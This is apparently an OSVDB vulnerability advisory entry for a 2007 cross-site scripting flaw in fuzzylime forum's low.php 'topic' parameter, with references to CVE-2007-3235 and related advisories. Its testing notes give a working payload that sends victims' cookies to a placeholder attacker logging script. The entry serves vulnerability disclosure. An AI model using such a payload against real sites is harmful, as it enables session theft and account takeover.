fuzzylime (forum) low.php topic Variable XSS

2007-06-12T00:00:00
ID OSVDB:36405
Type osvdb
Reporter OSVDB
Modified 2007-06-12T00:00:00

Description

Manual Testing Notes

http://[target]/low.php?topic="><script>document.location="http://[attacker]/logger.php?var="+document.cookie</script>

References:

Secunia Advisory ID:25653 Related OSVDB ID: 36406 Other Advisory URL: http://milw0rm.com/exploits/4062 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0226.html ISS X-Force ID: 34840 CVE-2007-3235